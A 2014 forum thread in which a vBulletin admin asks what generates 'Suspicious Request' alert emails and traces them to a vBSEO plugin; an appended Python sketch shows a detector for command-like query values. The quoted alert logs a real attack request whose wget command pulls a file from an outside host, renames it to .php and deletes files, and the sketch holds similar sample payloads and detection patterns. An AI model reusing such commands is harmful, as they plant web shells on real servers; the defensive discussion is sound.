#1
01-20-2014, 04:49 PM
Art Andrews
Join Date: Jan 2005
Posts: 29

What plugin generates Suspicious Request Notices?

For the life of me, I can't figure out where these are coming from, but I'd like to know more so I can investigate further. From time to time we get an email like the one below:

Email title:
Suspicious Request

Email body:
Cinput: wget http://www.allegoriaonline.it/images/incs.txt ; mv incs.txt incs.php ; rm -rf componentz.zip


Forum: http://www.therpf.com

IP: 176.28.49.238
User-agent: Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)
Request: /forum.php//images/stories/racrew.php?cmd=wget%20http://www.allegoriaonline.it/images/incs.txt%20;%20mv%20incs.txt%20incs.php%20;%20rm%20-rf%20componentz.zip
User: Unregistered

GET: array (
'cmd' => 'wget http://www.allegoriaonline.it/images/incs.txt ; mv incs.txt incs.php ; rm -rf componentz.zip',
)

POST: array (
'ajax' => NULL,
)

COOKIE: array (
'vbulletin_collapse' => NULL,
'bb_referrerid' => NULL,
'bb_userid' => NULL,
'bb_password' => NULL,
'bb_lastvisit' => NULL,
'bb_lastactivity' => NULL,
'bb_threadedmode' => NULL,
'bb_sessionhash' => NULL,
'bb_userstyleid' => NULL,
'bb_languageid' => NULL,
'bb_skipmobilestyle' => NULL,
'bb_forum_view' => NULL,
'vbulletin_sidebar_collapse' => NULL,
)

I have asked my server admin about it and he said nothing on the server side is doing it and that it is being generated through vB. I can't seem to find any info on it. Please help!

#2
01-20-2014, 05:57 PM
Lynne
Join Date: Sep 2004
Location: California/Idaho
Posts: 41,180

It's not from default vbulletin. You would need to look through your modifications to see what is generating it.

#3
01-20-2014, 06:04 PM
Max Taxable
Join Date: Feb 2011
Posts: 3,134

Quote:
User-agent: Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser
It's quite safe to enter the bolded into the definitions of the "Ban Spiders by User Agent" mod. Anyone still using that needs his/her ass removed anyway, and by the looks of your OP they're up to no good as well.

#4
01-22-2014, 01:57 PM
Art Andrews
Join Date: Jan 2005
Posts: 29

I think I may have figured out which plugin is generating this info:

vBSEO Suspicious Activity Tracker

Since vBSEO is no more, I can't really seem to find out anything else about it, but I did find it interesting.
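
A sketch of the kind of check that could produce a notice like the one in the first post, added here as an example and not taken from vBSEO or any vBulletin plugin: it percent-decodes each query parameter and flags values that look like shell commands. The rule names, patterns and sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Illustrative heuristics for shell-command content in a parameter value.
# These patterns are assumptions for this example, not vBSEO's rule set.
RULES = {
    "download-tool": re.compile(
        r"\b(?:wget|curl|fetch)\s+(?:-\S+\s+)*(?:https?|ftp)://", re.I),
    "destructive-or-rename": re.compile(
        r"\brm\s+-\w*[rf]|\bmv\s+\S+\s+\S+\.php\b", re.I),
    "command-chaining": re.compile(r";|&&|\||`|\$\("),
}

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2520) is seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(request_uri):
    """Return sorted (parameter, rule) pairs for values that look like commands."""
    hits = set()
    _, _, query = request_uri.partition("?")
    # Split on '&' only: a raw ';' inside a value is evidence, not a separator.
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = fully_decode(raw)
        matched = {rule for rule, rx in RULES.items() if rx.search(value)}
        # Chaining characters alone are common in ordinary text, so they only
        # count when a command-like pattern matched in the same value.
        if matched - {"command-chaining"}:
            hits.update((name, rule) for rule in matched)
    return sorted(hits)

# Constructed sample requests (example.invalid is a placeholder host).
SAMPLES = [
    "/forum.php//images/x.php?cmd=wget%20http://example.invalid/a.txt%20;%20mv%20a.txt%20a.php",
    "/index.php?q=curl%2520-s%2520https://example.invalid/x",
    "/search.php?query=wget+vs+curl;+which+is+better",
]

if __name__ == "__main__":
    for uri in SAMPLES:
        print(uri, "->", inspect_request(uri) or "no notice")
```

The check keys on the decoded request content rather than the User-Agent header, which the client sets freely.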